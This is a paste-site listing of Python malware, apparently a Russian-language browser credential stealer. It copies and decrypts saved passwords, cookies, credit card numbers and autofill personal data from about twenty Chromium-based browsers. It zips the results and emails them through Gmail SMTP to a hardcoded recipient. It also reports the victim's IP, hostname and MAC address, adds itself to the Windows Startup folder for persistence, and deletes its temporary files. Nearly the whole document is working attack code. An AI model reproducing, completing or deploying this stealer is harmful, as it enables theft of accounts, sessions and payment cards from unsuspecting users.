· 6 years ago · Jan 09, 2020, 08:08 AM
1#use pip install
2
3#check string 127-129
4#check string 75-77
5# 'sender' work only if server = gmail.com. If you want to use another, rewrite 385 line and 111.
6
7import geocoder
8import requests
9import bs4
10import smtplib
11import shutil
12import sys
13import os
14import socket
15import mimetypes
16import sqlite3
17import socket
18import winreg
19import zipfile
20import random
21import getpass
22import string
23import json
24from email.mime.multipart import MIMEMultipart
25from email.mime.multipart import MIMEMultipart
26from email.mime.text import MIMEText
27from email.mime.image import MIMEImage
28from email.mime.base import MIMEBase
29from email.mime.multipart import MIMEMultipart
30from re import findall
31from shutil import copy2
32from helpers import *
33from dpapi import Win32CryptUnprotectData
34from email import encoders
35from email.mime.base import MIMEBase
36from email.mime.multipart import MIMEMultipart
37import re
38from uuid import getnode as mac
39import getpass
40
41
42
43
44USER_NAME = getpass.getuser()
45
46
47def add_to_startup(file_path=""):
48 if file_path == "":
49 file_path = os.path.dirname(os.path.realpath(__file__))
50 bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME
51 with open(bat_path + '\\' + "open.bat", "w+") as bat_file:
52 bat_file.write(r'start "" %s' % file_path)
53
54
55print (" ")
56
57
58
59
60def infoall():
61
62 macaddres = (':'.join(re.findall('..', '%012x' % mac())))
63
64
65
66 s = requests.get('https://2ip.ua/ru/')
67 b = bs4.BeautifulSoup(s.text, "html.parser")
68 a = b.select(" .ipblockgradient .ip")[0].getText()
69
70
71 namecomp = (socket.gethostname())
72
73
74
75
76 sender = 'mail'
77 gmail_password = 'pass'
78 recipients = ['mail'] #кому
79
80 COMMASPACE = ', '
81
82
83
84
85
86
87 msg = MIMEMultipart()
88 msg['From'] = sender
89 msg['To'] = COMMASPACE.join(recipients)
90 msg['Subject'] = '!!\\New info/!!'
91 msg_text = ('ip' + (a))
92 body = msg_text
93 msg.attach(MIMEText(body, 'plain'))
94
95 msg_text1 = ('name computer' + " " + (namecomp))
96 body = msg_text1
97 msg.attach(MIMEText(body, 'plain'))
98
99 msg_text2 = (' ' + "Mac addres" + " " + ' ' + (macaddres))
100 body = msg_text2
101 msg.attach(MIMEText(body, 'plain'))
102
103
104
105
106 composed = msg.as_string()
107
108
109
110 try:
111 with smtplib.SMTP('smtp.gmail.com', 587) as s:
112 s.ehlo()
113 s.starttls()
114 s.ehlo()
115 s.login(sender, gmail_password)
116 s.sendmail(sender, recipients, composed)
117 s.close()
118 print(" ")
119 except:
120 print("Unable to send the email. Error: ", sys.exc_info()[0])
121 raise
122
123
124
125
126
127
128sender = 'mail'
129gmail_password = 'pass'
130recipients = ['mail'] #кому
131COMMASPACE = ', '
132
133
134
135pathusr = os.path.expanduser('~')
136
137
138browser_chrome = {
139 'google_chrome': pathusr + "\\AppData\\Local\\Google\\Chrome\\User Data\\",
140 'google_chromex86': pathusr + "\\AppData\\Local\\Google (x86)\\Chrome\\User Data\\",
141 'vivaldi': pathusr + "\\AppData\\Local\\Vivaldi\\User Data\\",
142 'opera': pathusr + "\\AppData\\Roaming\\Opera Software\\",
143 'kometa': pathusr + "\\AppData\\Local\\Kometa\\User Data\\",
144 'orbitum': pathusr + "\\AppData\\Local\\Orbitum\\User Data\\",
145 'comodo_dragon': pathusr + "\\AppData\\Local\\Comodo\\Dragon\\User Data\\",
146 'amigo': pathusr + "\\AppData\\Local\\Amigo\\User\\User Data\\",
147 'torch': pathusr + "\\AppData\\Local\\Torch\\User Data\\",
148 'yandex': pathusr + "\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\",
149 'comodo': pathusr + "\\AppData\\Local\\Comodo\\User Data\\",
150 '360br': pathusr + "\\AppData\\Local\\360Browser\\Browser\\User Data\\",
151 'maxtron': pathusr + "\\AppData\\Local\\Maxthon3\\User Data\\",
152 'kmelon': pathusr + "\\AppData\\Local\\K-Melon\\User Data\\",
153 'chromium': pathusr + "\\AppData\\Local\\Chromium\\User Data\\",
154 'sputnik': pathusr + "\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\",
155 'nichrome': pathusr + "\\AppData\\Local\\Nichrome\\User Data\\",
156 'coccoc': pathusr + "\\AppData\\Local\\CocCoc\\Browser\\User Data\\",
157 'uran': pathusr + "\\AppData\\Local\\Uran\\User Data\\",
158 'chromodo': pathusr + "\\AppData\\Local\\Chromodo\\User Data\\",
159 }
160
161
162profiles_chrome = {
163 'profile1': 'Profile 1\\',
164 'profile2': 'Profile 2\\',
165 'profile3': 'Profile 3\\',
166 'default': 'Default\\',
167 'opera': 'Opera Stable\\'
168 }
169
170
171db = pathusr + "\\db1"
172db2 = pathusr + "\\db2"
173db3 = pathusr + "\\db3"
174
175
176
177
178def login_chrome(file):
179 count = 0
180 logindata = "============логины=============\r\n"
181 copy2(file, db)
182 con = sqlite3.connect(db)
183 cursor = con.cursor()
184 cursor.execute("SELECT origin_url, username_value, password_value from logins;")
185 for origin_url, username_value, password_value in cursor.fetchall():
186 password = Win32CryptUnprotectData(password_value).decode("utf-8")
187 if password is not False:
188 if origin_url is not '':
189 logindata += 'САЙТ : ' + str(origin_url) + '\r\n'
190 if username_value is not '':
191 logindata += 'ЛОГ : ' + str(username_value) + '\r\n'
192 if password_value is not '':
193 logindata += 'ПАСС : ' + str(password) + '\r\n\r\n'
194 count += 1
195 return(count, logindata)
196
197
198def cook_chrome(file):
199 count = 0
200 cookdata = "============печени=============\r\n"
201 copy2(file, db2)
202 con = sqlite3.connect(db2)
203 cursor = con.cursor()
204 cursor.execute("SELECT host_key, name, value, path, last_access_utc, encrypted_value \
205 FROM cookies;")
206 for host_key, name, value, path, last_access_utc, encrypted_value in cursor.fetchall():
207 decrypted = Win32CryptUnprotectData(encrypted_value).decode("utf-8") or value or 0
208 if decrypted is not False:
209 cookdata += str(host_key) + "\tTRUE\t" + "/" + '\tFALSE\t' + str(last_access_utc) + '\t' + \
210 str(name) + '\t' + str(decrypted) + '\n'
211 count += 1
212 return(count, cookdata)
213
214
215def web_chrome(file):
216 count = 0
217 webdata = "============деньги=============\r\n"
218 copy2(file, db3)
219 con = sqlite3.connect(db3)
220 cursor = con.cursor()
221 cursor.execute("SELECT name_on_card, expiration_month, expiration_year,\
222 card_number_encrypted, billing_address_id FROM credit_cards;")
223 for name_on_card, expiration_month, expiration_year,\
224 card_number_encrypted, billing_address_id in cursor.fetchall():
225 decrypted = Win32CryptUnprotectData(card_number_encrypted).decode("utf-8")
226 if decrypted is not False:
227 if name_on_card is not '':
228 webdata += 'ИМЯ КАРТХОЛДЕРА: ' + name_on_card + '\r\n'
229 if expiration_month is not '':
230 webdata += 'МЕСЯЦ: ' + expiration_month + '\r\n'
231 if expiration_year is not '':
232 webdata += 'ГОД: ' + expiration_year + '\r\n'
233 if card_number_encrypted is not '':
234 webdata += 'НОМЕР КАРТЫ: ' + decrypted + '\r\n'
235 if billing_address_id is not '':
236 webdata += 'БИЛЛИНГ: ' + billing_address_id + '\r\n\r\n'
237
238
239 cursor.execute("SELECT guid, company_name, street_address,\
240 dependent_locality, city, state, zipcode, sorting_code,\
241 country_code, date_modified, origin, language_code,\
242 use_count, use_date, validity_bitfield FROM autofill_profiles")
243
244 for company_name, street_address,\
245 dependent_locality, city, state, zipcode, sorting_code,\
246 country_code, date_modified, origin, language_code,\
247 use_count, use_date, validity_bitfield in cursor.fetchall():
248 webdata += "============информ=============\r\n"
249 if company_name is not '':
250 webdata += company_name + '\r\n'
251 if street_address is not '':
252 webdata += street_address + '\r\n'
253 if dependent_locality is not '':
254 webdata += dependent_locality + '\r\n'
255 if city is not '':
256 webdata += city + '\r\n'
257 if state is not '':
258 webdata += state + '\r\n'
259 if zipcode is not '':
260 webdata += zipcode + '\r\n'
261 if sorting_code is not '':
262 webdata += sorting_code + '\r\n'
263 if country_code is not '':
264 webdata += country_code + '\r\n'
265 if date_modified is not '':
266 webdata += date_modified + '\r\n'
267 if origin is not '':
268 webdata += origin + '\r\n'
269 if language_code is not '':
270 webdata += language_code + '\r\n'
271 if use_count is not '':
272 webdata += use_count + '\r\n'
273 if use_date is not '':
274 webdata += use_date + '\r\n'
275 if validity_bitfield is not '':
276 webdata += validity_bitfield + '\r\n'
277 if company_name is not '':
278 count += 1
279 webdata += '\r\n\r\n'
280
281
282 cursor.execute("SELECT email FROM autofill_profile_emails")
283 for email in cursor.fetchall():
284 webdata += "============имейлы=============\r\n"
285 if email is not '':
286 webdata += email + '\r\n'
287 count += 1
288
289
290 cursor.execute("SELECT first_name, middle_name, last_name,\
291 full_name FROM autofill_profile_names")
292 for first_name, middle_name, last_name, full_name in cursor.fetchall():
293 webdata += "============деанон=============\r\n"
294 if first_name is not '':
295 webdata += first_name + '\r\n'
296 if middle_name is not '':
297 webdata += middle_name + '\r\n'
298 if last_name is not '':
299 webdata += last_name + '\r\n'
300 if full_name is not '':
301 webdata += full_name + '\r\n'
302 count += 1
303
304 return(count, webdata)
305
306def getXpom(savefolder):
307 countpass, countcook, countdata = 0, 0, 0
308 for browser_key, browser_folder in browser_chrome.items():
309 if check_exists(browser_folder):
310 for profile_key, profile_folder in profiles_chrome.items():
311 if check_exists(browser_folder+profile_folder):
312 if check_exists(browser_folder+profile_folder+"\\Login Data"):
313 try:
314 countpass, logindata = login_chrome(browser_folder+profile_folder+"\\Login Data")
315 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_logins.txt', "w")\
316 as file:
317 file.write(logindata)
318 except Exception as e:
319 countpass += 0
320
321 if check_exists(browser_folder+profile_folder+"\\Cookies"):
322 try:
323 countcook, cookdata = cook_chrome(browser_folder+profile_folder+"\\Cookies")
324 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_cookie.txt', "w")\
325 as file:
326 file.write(cookdata)
327 except Exception as e:
328 countcook += 0
329
330 if check_exists(browser_folder+profile_folder+"\\Web Data"):
331 try:
332 countdata, webdata = web_chrome(browser_folder+profile_folder+"\\Web Data")
333 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_ccdata.txt', "w")\
334 as file:
335 file.write(webdata)
336 except Exception as e:
337 countdata += 0
338
339 return(countpass, countcook, countdata)
340
341if __name__ == '__main__':
342 name_0f_user = getpass.getuser()
343 name_0f_pc = socket.gethostname()
344
345 browsers = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Temp\\browsers" + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(15))
346 if not check_exists(browsers):
347 os.mkdir(browsers)
348 getXpom(browsers)
349
350
351 TEMP_FILE = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Temp\\" + name_0f_user + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(15)) + ".zip"
352
353 zipf = zipfile.ZipFile(TEMP_FILE, 'w', zipfile.ZIP_DEFLATED)
354 zipdir(browsers, zipf)
355 zipf.close()
356
357
358 outer = MIMEMultipart()
359 outer['Subject'] = 'Stiller!'
360 outer['To'] = COMMASPACE.join(recipients)
361 outer['From'] = sender
362 outer.preamble = 'You will not see this in a MIME-aware mail reader.\n'
363
364
365 attachments = [TEMP_FILE]
366
367
368 for file in attachments:
369 try:
370 with open(file, 'rb') as fp:
371 msg = MIMEBase('application', "octet-stream")
372 msg.set_payload(fp.read())
373 encoders.encode_base64(msg)
374 msg.add_header('Content-Disposition', 'attachment', filename=os.path.basename(file))
375 outer.attach(msg)
376 except:
377 print("Unable to open one of the attachments. Error: ", sys.exc_info()[0])
378 raise
379
380 composed = outer.as_string()
381
382 # Send the email
383 try:
384 with smtplib.SMTP('smtp.gmail.com', 587) as s:
385 s.ehlo()
386 s.starttls()
387 s.ehlo()
388 s.login(sender, gmail_password)
389 s.sendmail(sender, recipients, composed)
390 s.close()
391 print("Wait")
392 except:
393 print("Unable to send the email. Error: ", sys.exc_info()[0])
394 raise
395
396 try:
397 os.remove(TEMP_FILE)
398 shutil.rmtree(browsers)
399 except OSError:
400 pass
401
402
403
404
405
406
407
408infoall()
409add_to_startup()